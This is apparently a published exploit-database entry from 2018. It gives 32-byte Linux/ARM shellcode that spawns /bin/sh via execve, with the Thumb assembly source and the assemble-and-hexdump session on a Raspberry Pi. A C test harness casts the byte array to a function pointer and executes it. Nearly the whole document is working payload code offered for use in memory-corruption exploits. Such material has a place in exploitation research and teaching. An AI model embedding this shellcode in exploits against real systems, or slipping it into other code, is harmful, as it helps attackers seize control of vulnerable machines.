Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)

/*
Title:  Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)
Date:   2018-08-16
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara

pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID:	Raspbian
Description:	Raspbian GNU/Linux 9.4 (stretch)
Release:	9.4
Codename:	stretch
pi@raspberrypi:~ $ cat binsh.s
.section .text
.global _start

_start:
    .ARM
    add  r3, pc, #1
    bx   r3

    .THUMB
    // execve("/bin/sh", ["/bin/sh"], NULL)
    adr  r0, spawn
    eor  r2, r2, r2
    strb r2, [r0, #7]
    push {r0, r2}
    mov  r1, sp
    mov  r7, #11
    svc  #1

    // adjust address
    eor  r7, r7, r7

spawn:
.ascii "/bin/shA"

pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41

*/

#include<stdio.h>
#include<string.h>

unsigned char sc[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x03\xa0\x52\x40\xc2\x71\x05\xb4"
"\x69\x46\x0b\x27\x01\xdf\x7f\x40"
"\x2f\x62\x69\x6e\x2f\x73\x68\x41";

void main()
{
    printf("Shellcode Length: %d\n", strlen(sc));

    int (*ret)() = (int(*)())sc;

    ret();
}